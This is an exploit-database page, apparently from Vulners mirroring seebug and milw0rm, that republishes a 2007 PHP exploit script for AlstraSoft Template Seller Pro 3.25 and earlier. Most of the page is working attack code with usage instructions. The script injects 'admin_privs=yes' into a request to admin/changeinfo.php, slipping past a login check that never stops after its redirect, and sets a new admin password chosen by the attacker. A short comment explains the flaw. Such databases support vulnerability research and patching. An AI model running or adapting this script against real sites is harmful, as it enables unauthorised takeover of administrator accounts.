Lucene search
K

AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 23 Views

AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit. Allows an attacker to change the admin password

Code

                                                #!/usr/bin/php -q -d short_open_tag=on
&#60;?
echo &#34;
AlstraSoft Template Seller Pro &#60;= 3.25 Admin Password Change Exploit
by BlackHawk &#60;[email protected]&#62; &#60;http://itablackhawk.altervista.org&#62;
Thanks to rgod for the php code and Marty for the Love

&#34;;
if ($argc&#60;4) {
echo &#34;Usage: php &#34;.$argv[0].&#34; Host Path ID password
Host:          target server (ip/hostname)
Path:          path of template
ID:            A Valid Admin ID (usally 1 works for the &#39;admin&#39; nickname)
password:      The PWD you want to set

Example:
php &#34;.$argv[0].&#34; localhost /template/ 1 hawk&#34;;

die;
}
error_reporting(0);
ini_set(&#34;max_execution_time&#34;,0);
ini_set(&#34;default_socket_timeout&#34;,5);

/*
 ___________________________________________________________________
/       This script is part of the AlstraSoft Exploit Pack:         \
|                                                                   |
|  http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack;  |
|                                                                   |
|            You can find the patches for this bugs at:             |
|                                                                   |
|   http://itablackhawk.altervista.org/download/alsoft_patch.zip    |
|                                                                   |
\________________________.:BlackHawk 2007:._________________________/

*/

/*
VULN EXPLANATION

look at include/main.php, checkLogin function:

function checkLogin()
{
		global $username, $userpassword, $userID,$conn;
		global $user_name, $user_pass, $admin_privs,$designer_privs,$affiliate_privs;

		session_start();
		session_register(&#34;session&#34;);
		if ($user_name == &#34;&#34; AND $username == &#34;&#34;)
		{
			header(&#34;Location:index.php&#34;);
		}
		elseif ($user_name != &#34;&#34; OR $username != &#34;&#34;)
		{
			$sql_user_name = $user_name;
			$md5_pass = md5($user_pass);
						
			$sql = &#34;SELECT * FROM UserDB WHERE user_name=&#39;$sql_user_name&#39; and user_password=&#39;$md5_pass&#39;&#34;;
			$ADODB_FETCH_MODE = ADODB_FETCH_ASSOC;
			$recordSet = $conn-&#62;Execute($sql);
			$num = $recordSet-&#62;RecordCount();
			if ($num == 1)
			{
				[...]
				session_register(&#34;admin_privs&#34;);
				[...]
			}
			else
			{
				header(&#34;Location:index.php&#34;);
			}
		} // end elseif

mmm.. there isn&#39;t any exit or die() after header(&#39;Location: index.php&#39;)..
so the first part of the security can be bypassed..

now look at admin/changeinfo.php:

&#60;?php
include(&#34;../include/common.php&#34;);
include(&#34;../include/main.php&#34;);
global $conn,$config;		
checklogin();   
if($admin_privs==&#39;yes&#39;)
{
 [...]
}

if you are a legal user, $admin_privs will be the value of $_SESSIN[admin_privs],
but if you aren&#39;t logged in this session simply do not exist, and you can inject
the proper value trough the URL..
*/

function quick_dump($string)
{
  $result=&#39;&#39;;$exa=&#39;&#39;;$cont=0;
  for ($i=0; $i&#60;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &#60;= 32 ) | (ord($string[$i]) &#62; 126 ))
   {$result.=&#34;  .&#34;;}
   else
   {$result.=&#34;  &#34;.$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=&#34; &#34;.dechex(ord($string[$i]));}
   else
   {$exa.=&#34; 0&#34;.dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.=&#34;\r\n&#34;; $exa.=&#34;\r\n&#34;;}
  }
 return $exa.&#34;\r\n&#34;.$result;
}
$proxy_regex = &#39;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#39;;
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy==&#39;&#39;) {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo &#39;No response from &#39;.$host.&#39;:&#39;.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo &#39;Not a valid proxy...&#39;;die;
    }
    $parts=explode(&#39;:&#39;,$proxy);
    echo &#34;Connecting to &#34;.$parts[0].&#34;:&#34;.$parts[1].&#34; proxy...\r\n&#34;;
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo &#39;No response from proxy...&#39;;die;
	}
  }
  fputs($ock,$packet);
  if ($proxy==&#39;&#39;) {
    $html=&#39;&#39;;
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html=&#39;&#39;;
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$adminID=$argv[3];
$password=$argv[4];


$port=80;
$proxy=&#34;&#34;;

if (($path[0]&#60;&#62;&#39;/&#39;) or ($path[strlen($path)-1]&#60;&#62;&#39;/&#39;)) {echo &#39;Error... check the path!&#39;; die;}
if ($proxy==&#39;&#39;) {$p=$path;} else {$p=&#39;http://&#39;.$host.&#39;:&#39;.$port.$path;}

echo &#34;- Changing admin password...\r\n&#34;;
$packet=&#34;GET &#34;.$p.&#34;admin/changeinfo.php?admin_privs=yes&submit=sottometto&userID=$adminID&frompassword=$password HTTP/1.0\r\n&#34;;
$packet.=&#34;Host: &#34;.$host.&#34;\r\n&#34;;
$packet.=&#34;Connection: Close\r\n\r\n&#34;;
sendpacketii($packet);

if (!eregi(&#34;Info Successfully&#34;,$html))
{
echo &#39;ERROR EXPLOITING - TRY AGAIN\r\n&#39;;
exit;
}

echo &#39;Exploit worked, your new password for the admin user (ID: &#39;.$adminID.&#39;) has been changed into: &#39;.$password;

# Coded With BH Fast Generator v0.1
?&#62;

# milw0rm.com [2007-05-20]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation